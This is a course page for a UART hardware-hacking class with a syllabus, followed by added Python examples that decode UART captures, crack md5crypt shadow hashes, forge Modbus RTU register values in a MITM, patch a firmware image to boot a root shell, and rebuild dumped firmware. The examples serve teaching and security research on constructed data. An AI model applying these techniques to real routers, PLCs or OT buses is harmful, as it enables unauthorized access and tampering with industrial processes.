
TrainSec

UART Hacking course

via TrainSec

Overview

The course runs from pin identification and log capture, through analysis of the OT serial protocols (RS232/422/485) and firmware extraction, to hands-on tool-building labs (developing a true MITM device) and practical techniques for bypassing secure boot and writing UART exploits.

Syllabus

  • Class 01 - Why Hack UART?
    • This class explains why UART is one of the most valuable entry points in hardware hacking. Students learn that UART, as a universal asynchronous receiver-transmitter, is embedded in almost every device to provide debugging and development support. The instructor highlights how engineers often leave UART ports active and unprotected, unintentionally creating backdoors. By tapping into UART, attackers can retrieve logs, interact with bootloaders, or even gain administrative shells. The lesson also connects UART to its industrial counterparts (RS232, RS422, RS485), showing how the same concept spans from consumer electronics to critical infrastructure. By the end of the class, students see UART not just as a protocol but as a direct, low-level attack vector. This sets the stage for the rest of the module, which progressively builds from identifying pins to performing advanced exploitation.
  • Class 02 – Identifying UART Pins
    • This session provides the practical skill of identifying UART pins on unknown devices. Because manufacturers rarely label these pins, students must apply systematic techniques to locate RX, TX, and GND. The instructor demonstrates using a multimeter in continuity mode to find ground, measuring idle voltages to spot the transmit line (an idle UART TX sits at the board's logic-high level, commonly 3.3 V, and toggles during boot), and validating the signal with an oscilloscope, a logic analyzer, or a USB-to-UART converter. Common pitfalls are discussed in detail to avoid hardware damage: mistaking power lines for data pins, and connecting a 5 V adapter to a 3.3 V or 1.8 V target. This class connects to the module by ensuring students can reliably establish a physical UART connection, which is a prerequisite for all later exploitation techniques. Without proper pin identification, UART attacks cannot proceed.
  • Class 03 – Sniffing Log
    • In this class, students learn to capture the debug logs and system messages that devices emit over UART. Many devices print boot sequences, error logs, or kernel diagnostics on the serial console even when interactive input is disabled. By connecting only the device's TX line and ground to a serial adapter, students can collect valuable intelligence about firmware versions, hardware components, and potential weak points without sending a single byte to the target. This reconnaissance step is crucial before any attempt at active exploitation. The instructor demonstrates how logs reveal device configurations, sometimes including credentials or debug flags left by engineers. This class ties into the module by establishing that UART serves not only as an interactive shell but also as a transparent window into system internals.
  • Class 04 – Bypassing Simple Login
    • In this class, students learn how UART shell access can be turned into a direct bypass of a router's administrative login screen. By navigating the file system exposed through the UART shell, the instructor demonstrates how to identify user entries and extract the stored password hashes (on Linux-based devices, typically from /etc/passwd or /etc/shadow). Students then see how to identify the hash format and apply brute-force or dictionary attacks to recover the plaintext credentials, which also unlock the web interface. This exercise highlights how engineers often rely on a GUI login for protection while leaving the real keys to the system exposed through UART.
  • Class 05 – UART and the OT World
    • This class marks the transition point from consumer hardware exploitation into the industrial OT domain. The instructor explains how UART is embedded not only in small devices but also in PLCs, controllers, and other industrial systems, where the same UART framing underlies RS232, RS422, and RS485 links. Students learn how UART access on OT devices can expose process logic, control flows, and critical system logs, with the potential to impact production lines and safety mechanisms.
  • Class 06 – Connecting to OT Communication Lines
    • Students now practice connecting to live OT communication lines safely. Unlike small devices, OT setups often involve RS485/422 buses with multiple nodes sharing one pair of wires. The instructor demonstrates how to tap into these lines without disrupting the signal or crashing the system. Emphasis is placed on non-invasive tapping (receive-only taps that never drive the bus and do not add a second termination), using proper transceivers, and avoiding collisions when inserting sniffers. The class strengthens the module by giving students the confidence to handle real-world OT wiring while preventing operational downtime or damage.
  • Class 07 – Identifying the Right Wires
    • OT environments often contain dense cable harnesses carrying power, sensors, and communication signals. This class teaches students how to differentiate between these wire types and locate the correct communication lines. Using systematic probing and measurement, students avoid dangerous mistakes such as connecting to power instead of data lines. This class connects to the full module by preparing students for field scenarios, where correct identification of communication lines is essential before any sniffing or exploitation attempt.
  • Class 08 – From OT to UART
    • This class explains how OT protocols like RS485 and RS422 are built on UART concepts. Students learn how these differential signaling systems can be bridged back into UART, enabling attackers to exploit them with the same tools used on embedded devices. The instructor demonstrates how the RS485/422 A/B differential pair maps, through a transceiver such as a MAX485, back to single-ended RX/TX at UART logic levels, making exploitation possible once the correct adaptors are used. This bridges OT communication to the rest of the module, showing how UART-level exploitation applies universally.
  • Class 09 – Sniffing OT Network (43 mins)
  • Class 10 – Reversing OT Traffic
    • This session focuses on reverse engineering OT traffic. Students learn to decode captured packet formats, recognize timing intervals, and map client-server interactions. The instructor demonstrates how UART-level sniffing reveals the logic of industrial processes, preparing students for active injection and manipulation. This class ties into the module as the transition from reconnaissance to exploitation.
  • Class 11 – True MITM on OT
    • Students escalate into full man-in-the-middle attacks on OT networks. The instructor demonstrates designing a device with relays and MAX485 modules that sits in the bus and intercepts all traffic between PLCs and clients. Unlike simple sniffers, this device can modify, inject, or block packets in real time. Emphasis is placed on timing challenges, avoiding collisions, and synchronizing injection with the transceivers' direction-enable pins driven from GPIO. This class connects to the module by moving students from passive observers to active manipulators of OT processes.
  • Class 12 – Fault Injection in UART Attacks (43 mins)
  • Class 13 – Bypassing Kill Switch Protection
    • This class explores defeating advanced hardware protections, such as kill switches that disable devices upon tampering. Students learn how to identify these mechanisms and bypass them using UART, MITM, and glitching techniques. The instructor demonstrates real-world scenarios where kill switches were overcome to maintain system access. This class ties together all prior lessons—pin identification, sniffing, reversing, MITM, and fault injection—into a comprehensive exploitation strategy.
  • Class 14 – Bypassing secure boot
    • In this advanced class, students examine secure boot as both a defensive measure and an exploitable weakness. The instructor first explains the purpose and flow of secure boot, showing how cryptographic checks are meant to prevent unauthorized code execution. From there, the weaknesses of real implementations are exposed. Students learn three practical bypass strategies: inducing faults to disrupt validation, forcing single-user mode to escalate privileges, and manipulating firmware images directly to subvert checks. This class makes clear that secure boot, while marketed as bulletproof, is often vulnerable to precise hardware-level intervention.
  • Class 15 – Firmware extraction - the UART way
    • This class teaches how to extract complete firmware images from devices once UART access has been gained. The instructor first demonstrates leveraging built-in MCU bootloaders, showing how vendors like STMicroelectronics, NXP, TI, Espressif, and others expose UART-based programming interfaces that can be repurposed for firmware dumping unless the vendor has enabled readout protection. The second technique uses captured UART logs: a firmware hexdump streamed to the terminal can be reconstructed into a binary file using a simple Python script. By the end, students will know how attackers recover entire firmware images for offline reverse engineering, analysis, and implant development.
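The following Python is an added example, not course material from TrainSec. It performs in software the check from Class 02 and the passive capture from Class 03: given a logic-analyzer style capture (one 0/1 sample per entry at a known sample rate) from a candidate TX pin, it infers the baud rate from the shortest pulse and decodes the 8N1 frames. The waveform is constructed with uart_encode(), so nothing here is a recording of a real device; 8N1 framing, an idle-high line and the 1 MS/s sample rate are assumptions.

```python
# Added example (not from the TrainSec course): check a candidate TX pin the way
# Class 02 and Class 03 describe, but in software. Input is a logic-analyzer style
# capture: one 0/1 sample per entry at a known sample rate. The capture below is
# constructed with uart_encode(); it is not a recording of any real device.
# Assumptions: 8 data bits, no parity, 1 stop bit (8N1), idle-high line.

STANDARD_BAUDS = (9600, 19200, 38400, 57600, 115200, 230400, 460800, 921600)


def uart_encode(data: bytes, baud: int, fs: int, idle_samples: int = 40) -> list:
    """Build a sampled 8N1 waveform (LSB first, idle high) to act as test input."""
    spb = fs / baud                       # samples per bit, may be fractional
    bits = []
    for byte in data:
        bits += [0] + [(byte >> i) & 1 for i in range(8)] + [1]   # start, data, stop
        bits += [1, 1]                    # two idle bit times between frames
    samples = [1] * idle_samples
    for i, b in enumerate(bits):
        # accumulate rounding so a fractional spb does not drift over the stream
        samples += [b] * (round((i + 1) * spb) - round(i * spb))
    return samples + [1] * idle_samples


def guess_baud(samples: list, fs: int) -> int:
    """The shortest run of identical samples is about one bit time; snap it to a standard rate."""
    runs, run = [], 1
    for prev, cur in zip(samples, samples[1:]):
        if cur == prev:
            run += 1
        else:
            runs.append(run)
            run = 1
    if not runs:
        raise ValueError("line never toggles: not a TX pin, or the device is silent")
    raw = fs / min(runs)
    return min(STANDARD_BAUDS, key=lambda b: abs(b - raw))


def uart_decode(samples: list, baud: int, fs: int):
    """Decode 8N1 frames by sampling at bit centres; returns (bytes, framing_errors)."""
    spb = fs / baud
    out, errors, i, n = bytearray(), 0, 1, len(samples)
    while i < n:
        if samples[i - 1] == 1 and samples[i] == 0:          # falling edge: start bit
            centres = [int(i + spb * (k + 0.5)) for k in range(10)]
            if centres[-1] >= n:
                break
            bits = [samples[c] for c in centres]
            if bits[0] != 0 or bits[9] != 1:                  # bad start or stop bit
                errors += 1
                i += 1
                continue
            out.append(sum(bit << k for k, bit in enumerate(bits[1:9])))
            i = centres[9]                                    # resume from the stop bit
        else:
            i += 1
    return bytes(out), errors


def sniff(samples: list, fs: int):
    """What a practitioner wants from a candidate pin: the rate, the text, and the error count."""
    baud = guess_baud(samples, fs)
    data, errors = uart_decode(samples, baud, fs)
    return baud, data, errors


if __name__ == "__main__":
    FS = 1_000_000                                            # 1 MS/s capture (assumed)
    BANNER = b"U-Boot 2020.04 (constructed)\r\n"
    wave = uart_encode(BANNER, 115200, FS)
    print(sniff(wave, FS))
    print(uart_decode(wave, 57600, FS))                       # wrong rate: garbage, not the banner
```

On a real capture the shortest run can be a glitch rather than a bit, so take the median of the shortest few runs instead of the minimum; a framing-error count that stays high at every standard rate usually means the pin is not a UART TX at all, or the sample rate is wrong.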
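As an added example for Class 04 (not TrainSec's code), the script below does what the class describes once the hashes are in hand: it classifies the hash field of each user entry and runs a dictionary attack on md5crypt ($1$), a scheme still common on BusyBox-based routers. The shadow lines, salts and word list are constructed; md5crypt() follows the public crypt(3) algorithm so the sample hashes are generated by the same routine that attacks them.

```python
import hashlib
import re

# Added example (not from the TrainSec course) for Class 04: identify the hash scheme in
# user entries pulled over the UART shell and run a dictionary attack on md5crypt ($1$).
# The shadow lines and word list are constructed; md5crypt() follows crypt(3).

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password: bytes, salt: bytes) -> str:
    """$1$ hash as produced by crypt(3) / BusyBox: '$1$' + salt + '$' + 22 chars."""
    magic, salt = b"$1$", salt[:8]
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    pl = len(password)
    while pl > 0:                                 # mix in the alternate sum
        ctx.update(alt[: min(16, pl)])
        pl -= 16
    i = len(password)
    while i:                                      # the odd bit-by-bit step of the spec
        ctx.update(b"\0" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    for r in range(1000):                         # 1000 stretching rounds
        h = hashlib.md5(password if r & 1 else final)
        if r % 3:
            h.update(salt)
        if r % 7:
            h.update(password)
        h.update(final if r & 1 else password)
        final = h.digest()
    enc = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        enc += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    enc += _to64(final[11], 2)
    return f"$1${salt.decode()}${enc}"


PREFIXES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
            "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt", "$y$": "yescrypt"}


def identify(hash_field: str) -> str:
    """Classify the second field of a passwd/shadow entry."""
    if hash_field == "":
        return "empty (login with no password)"
    if hash_field.startswith(("!", "*")):
        return "locked"
    for prefix, name in PREFIXES.items():
        if hash_field.startswith(prefix):
            return name
    if re.fullmatch(r"[./0-9A-Za-z]{13}", hash_field):
        return "descrypt"
    return "unknown"


def parse_entries(text: str):
    """(user, hash) pairs from /etc/shadow or an /etc/passwd that still carries hashes."""
    entries = []
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            fields = line.split(":")
            entries.append((fields[0], fields[1]))
    return entries


def crack_md5crypt(hash_str: str, wordlist):
    _, _, salt, _ = hash_str.split("$")           # '$1$<salt>$<hash>'
    for word in wordlist:
        if md5crypt(word.encode(), salt.encode()) == hash_str:
            return word
    return None


def audit(shadow_text: str, wordlist):
    """user -> (scheme, recovered password or None)"""
    results = {}
    for user, h in parse_entries(shadow_text):
        scheme = identify(h)
        cracked = crack_md5crypt(h, wordlist) if scheme == "md5crypt" else None
        results[user] = (scheme, cracked)
    return results


# Constructed sample: hashes generated by md5crypt() above, salts made up.
SAMPLE_SHADOW = "\n".join([
    "root:" + md5crypt(b"admin1234", b"rN3kz8Qa") + ":18000:0:99999:7:::",
    "admin:" + md5crypt(b"support", b"ZxcvB1nm") + ":18000:0:99999:7:::",
    "nobody:*:18000:0:99999:7:::",
    "daemon::18000:0:99999:7:::",
])
WORDLIST = ["password", "admin", "123456", "support", "admin1234"]

if __name__ == "__main__":
    for user, (scheme, pw) in audit(SAMPLE_SHADOW, WORDLIST).items():
        print(f"{user:8} {scheme:12} {pw}")
```

The script shows the mechanics only; for a real word list use hashcat (mode 500 for md5crypt) or John the Ripper. Note the two entries that need no cracking at all: an empty hash field means the account logs in without a password, and a locked field ("*" or "!") means that account is not a login route.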
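For Class 10 and Class 11, the added example below (again not TrainSec's code) covers the software side of reversing and then manipulating RS485 traffic: it frames a timestamped byte capture by the inter-byte silence, validates each frame's CRC, pairs requests with responses on the half-duplex bus, and applies the rewrite-and-refix-CRC step a true MITM performs on a response. The page does not name a protocol; Modbus RTU is assumed here because it is the most common one on RS485. The capture is constructed, not from any PLC.

```python
# Added example (not from the TrainSec course) for Class 10 and Class 11: frame a
# timestamped RS485 byte capture by the inter-byte silence, validate each frame,
# pair requests with responses, and apply the rewrite step a true MITM performs.
# Modbus RTU is assumed (the page names no protocol). The capture is constructed.


def crc16_modbus(data: bytes) -> int:
    """CRC-16/MODBUS: init 0xFFFF, reflected polynomial 0xA001, no final XOR."""
    crc = 0xFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA001 if crc & 1 else crc >> 1
    return crc


def with_crc(body: bytes) -> bytes:
    crc = crc16_modbus(body)
    return body + bytes([crc & 0xFF, crc >> 8])          # low byte first on the wire


def split_frames(capture, baud: int = 9600):
    """capture: list of (timestamp_seconds, byte). Modbus RTU ends a frame after
    3.5 character times of silence (11 bit times per character)."""
    gap = 3.5 * 11 / baud
    frames, current, last_t = [], bytearray(), None
    for t, byte in capture:
        if current and last_t is not None and t - last_t > gap:
            frames.append(bytes(current))
            current = bytearray()
        current.append(byte)
        last_t = t
    if current:
        frames.append(bytes(current))
    return frames


def parse_frame(frame: bytes):
    """Return {'unit', 'fc', 'payload'} or None if the frame is short or the CRC fails."""
    if len(frame) < 4:
        return None
    body, crc_rx = frame[:-2], frame[-2] | (frame[-1] << 8)
    if crc16_modbus(body) != crc_rx:
        return None
    return {"unit": body[0], "fc": body[1], "payload": body[2:]}


def pair_transactions(frames):
    """Half-duplex bus: a valid frame followed by one with the same unit and function
    code is a request/response pair. Unanswered requests are dropped."""
    pairs, pending = [], None
    for frame in frames:
        parsed = parse_frame(frame)
        if parsed is None:
            continue
        if pending and pending["unit"] == parsed["unit"] and pending["fc"] == parsed["fc"]:
            pairs.append((pending, parsed))
            pending = None
        else:
            pending = parsed
    return pairs


def rewrite_register(response: bytes, index: int, new_value: int) -> bytes:
    """MITM step: change one 16-bit register in a Read Holding Registers (fc 3)
    response and recompute the CRC so the master accepts it."""
    parsed = parse_frame(response)
    if parsed is None or parsed["fc"] != 3:
        raise ValueError("not a valid fc 3 response")
    body = bytearray(response[:-2])
    offset = 3 + 2 * index                               # unit, fc, byte count, then registers
    body[offset:offset + 2] = new_value.to_bytes(2, "big")
    return with_crc(bytes(body))


def build_capture(frames, baud: int = 9600, silence: float = 0.010):
    """Constructed capture: bytes back to back inside a frame, silence between frames."""
    t, capture = 0.0, []
    for frame in frames:
        for byte in frame:
            capture.append((round(t, 6), byte))
            t += 11 / baud
        t += silence
    return capture


# Constructed traffic: master reads 2 holding registers from unit 1; unit 1 answers 100 and 300.
REQUEST = with_crc(bytes.fromhex("01 03 0000 0002"))
RESPONSE = with_crc(bytes.fromhex("01 03 04 0064 012C"))

if __name__ == "__main__":
    frames = split_frames(build_capture([REQUEST, RESPONSE]))
    for req, resp in pair_transactions(frames):
        print("request", req.hex(" "), "response", resp.hex(" "))
    forged = rewrite_register(RESPONSE, 1, 0)            # report 0 instead of 300
    print(forged.hex(" "), parse_frame(forged))
```

The rewrite is only half of the MITM: on a shared RS485 pair a byte cannot be overwritten in flight, which is why the class builds the device around relays and two MAX485 transceivers that physically split the bus into a PLC side and a client side. The forged response must then be transmitted within the master's timeout, with the transceiver's driver enabled only while sending so the two halves do not collide.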
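The third bypass strategy of Class 14, manipulating the firmware image to subvert the check, is illustrated by the added example below (not TrainSec's code). It puts two boot-time verifiers side by side: one that only checks an unkeyed digest stored in the header, and one that checks a keyed tag. Patching the payload and recomputing the digest satisfies the first but not the second. The image format, the key and the payload are invented for this example; real secure boot verifies an asymmetric signature with a public key held in ROM or OTP, and the HMAC here only stands in for that (the attacker lacks the key either way).

```python
import hashlib
import hmac
import struct

# Added example (not from the TrainSec course) for Class 14: two boot-time image
# checks side by side, and the image-manipulation bypass the class describes.
# The image format, the key and the payload are invented. HMAC stands in for the
# asymmetric signature real secure boot uses; the attacker has neither key.

MAGIC = b"FWIM"
HEADER = struct.Struct("<4sI32s32s")          # magic, payload length, sha256, hmac-sha256
KEY = b"oem-signing-key-never-on-the-device"  # invented


def build_image(payload: bytes, key: bytes) -> bytes:
    digest = hashlib.sha256(payload).digest()
    tag = hmac.new(key, payload, "sha256").digest()
    return HEADER.pack(MAGIC, len(payload), digest, tag) + payload


def _split(image: bytes):
    magic, length, digest, tag = HEADER.unpack_from(image)
    payload = image[HEADER.size:HEADER.size + length]
    return magic, length, digest, tag, payload


def verify_integrity_only(image: bytes) -> bool:
    """An unkeyed digest in the header detects corruption, not tampering."""
    magic, length, digest, _, payload = _split(image)
    return magic == MAGIC and len(payload) == length and hashlib.sha256(payload).digest() == digest


def verify_authenticated(image: bytes, key: bytes) -> bool:
    """Keyed check: the attacker cannot recompute the tag after patching."""
    magic, length, _, tag, payload = _split(image)
    expected = hmac.new(key, payload, "sha256").digest()
    return magic == MAGIC and len(payload) == length and hmac.compare_digest(expected, tag)


def patch_image(image: bytes, old: bytes, new: bytes) -> bytes:
    """Attacker side: patch the payload in place and refresh the digest. The tag is
    copied unchanged because the attacker has no key."""
    if len(old) != len(new):
        raise ValueError("patch must keep the payload length")
    _, _, _, tag, payload = _split(image)
    idx = payload.find(old)
    if idx < 0:
        raise ValueError("pattern not found")
    patched = payload[:idx] + new + payload[idx + len(old):]
    return HEADER.pack(MAGIC, len(patched), hashlib.sha256(patched).digest(), tag) + patched


# Constructed payload: a bootargs string like those seen in UART boot logs.
PAYLOAD = b"bootargs=console=ttyS0,115200 root=/dev/mtdblock2 init=/sbin/init\0"
ORIGINAL = build_image(PAYLOAD, KEY)
# Same-length swap that drops the board into a root shell instead of init.
TAMPERED = patch_image(ORIGINAL, b"init=/sbin/init", b"init=/bin/sh   ")

if __name__ == "__main__":
    for name, img in (("original", ORIGINAL), ("tampered", TAMPERED)):
        print(name, "integrity:", verify_integrity_only(img), "authenticated:", verify_authenticated(img, KEY))
```

When the keyed check is in place, the image route is closed and the remaining options are the other two the class lists: glitching the comparison itself, or changing what runs after verification (the single-user route) rather than what was verified.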
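Class 15 mentions rebuilding a binary from a hexdump captured over UART with a simple Python script; the one below is an added example written for this page, not the course's own script. It accepts U-Boot `md.b` lines ("addr: xx xx ...") and `hexdump -C` lines ("addr  xx xx ...  |ascii|") including the "*" repeat marker, skips prompts and terminal noise, and reports address gaps, which is what a line lost over a flaky serial link looks like. Both dumps are constructed; only the uImage magic 27 05 19 56 in the first one is a real value.

```python
import re

# Added example (not from the TrainSec course) for Class 15: rebuild a binary from a
# hexdump streamed over UART. Handles U-Boot `md.b` lines, `hexdump -C` lines with
# the "*" repeat marker, skips prompts and noise, and reports address gaps.
# The dumps below are constructed; the uImage magic 27 05 19 56 is real.

HEX_LINE = re.compile(r"^\s*([0-9A-Fa-f]{6,16})[: ]\s*((?:[0-9A-Fa-f]{2}\s+){1,16})")


def parse_hexdump(text: str):
    """(address, data, preceded_by_star) per recognised line."""
    rows, star = [], False
    for line in text.splitlines():
        if line.strip() == "*":
            star = True
            continue
        m = HEX_LINE.match(line)
        if not m:
            continue                                   # prompt, banner, noise
        rows.append((int(m.group(1), 16), bytes.fromhex(m.group(2)), star))
        star = False
    return rows


def reconstruct(rows, fill: int = 0xFF):
    """Concatenate rows by address. Returns (binary, gaps); gaps are filled with
    `fill` (0xFF, the erased-flash value) so later offsets stay correct."""
    if not rows:
        return b"", []
    out, gaps, prev = bytearray(), [], b""
    base = rows[0][0]
    for i, (addr, data, star) in enumerate(rows):
        if i + 1 < len(rows):
            width = rows[i + 1][0] - addr
            if 0 < width < 16:                        # guard: ASCII column read as hex
                data = data[:width]
        data = data[:16]
        expected = base + len(out)
        if addr < expected:                           # repeated line (e.g. dump re-run)
            continue
        if addr > expected:
            if star and prev:                         # hexdump -C "*": previous line repeats
                while base + len(out) < addr:
                    out += prev[:addr - base - len(out)]
            else:                                     # line lost over UART
                gaps.append((expected, addr))
                out += bytes([fill]) * (addr - expected)
        out += data
        prev = data
    return bytes(out), gaps


# Constructed U-Boot session: the prompt lines are noise the parser must skip.
SAMPLE_MD_B = """=> md.b 0x9f000000 0x30
9f000000: 27 05 19 56 f1 3c 2a 1d 5e 8b 0a 00 00 1f 3c 20    '..V.<*.^.....<
9f000010: 80 00 00 00 80 00 00 00 0c 4a 77 9a 05 05 02 03    .........Jw.....
9f000020: 4c 69 6e 75 78 2d 34 2e 31 34 2e 31 39 35 00 00    Linux-4.14.195..
=>"""

# Constructed hexdump -C output with a repeat marker.
SAMPLE_HEXDUMP_C = """00000000  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
*
00000020  55 aa 01 02 03 04 05 06  07 08 09 0a 0b 0c 0d 0e  |U...............|
00000030"""

if __name__ == "__main__":
    for text in (SAMPLE_MD_B, SAMPLE_HEXDUMP_C):
        blob, gaps = reconstruct(parse_hexdump(text))
        print(len(blob), "bytes, gaps:", gaps)
```

A serial dump of a whole flash is slow and the capture will drop lines now and then, so dump in chunks, re-request any range the gap list reports, and check the result against whatever integrity data the image itself carries (a legacy uImage header, for instance, states the payload size and its CRC).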

Taught by

Amichai Yifrach
